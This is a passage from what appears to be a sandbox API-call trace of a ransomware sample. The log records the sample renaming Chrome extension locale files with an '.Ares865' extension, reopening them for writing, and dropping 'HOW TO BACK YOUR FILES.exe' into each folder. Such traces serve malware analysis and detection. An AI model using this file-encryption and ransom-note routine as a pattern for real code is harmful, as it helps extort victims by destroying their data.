Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json.Ares865") returned 162 [0102.580] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.581] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.582] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=179) returned 1 [0102.585] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk" [0102.585] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk" [0102.585] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.585] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.586] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.586] GetLastError () returned 0x0 [0102.586] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.586] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852b04f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4eb67220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4eb67220, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.586] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.586] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.587] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json.Ares865") returned 162 [0102.587] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.588] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.588] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=179) returned 1 [0102.592] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru" [0102.592] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru" [0102.592] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.592] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.593] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.593] GetLastError () returned 0x0 [0102.593] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.593] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852b04f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4eb67220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4eb67220, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.593] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.593] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.594] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json.Ares865") returned 162 [0102.594] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.595] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.595] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=179) returned 1 [0102.598] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro" [0102.598] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro" [0102.598] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.598] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.599] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.599] GetLastError () returned 0x0 [0102.600] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.600] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852b04f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4eb67220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4eb67220, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.600] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.600] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.600] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json.Ares865") returned 162 [0102.600] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.601] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.602] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=179) returned 1 [0102.605] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT" [0102.605] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT" [0102.605] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.605] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_pt\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.606] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.606] GetLastError () returned 0x0 [0102.606] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.606] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852b04f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4eb67220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4eb67220, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.606] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.606] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.607] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\messages.json.Ares865") returned 165 [0102.607] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_pt\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_pt\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.608] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_pt\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.608] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=179) returned 1 [0102.611] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR" [0102.611] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR" [0102.611] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.612] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_br\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.612] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.612] GetLastError () returned 0x0 [0102.613] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.613] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8528a390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4eb67220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4eb67220, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.613] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.613] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.613] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User 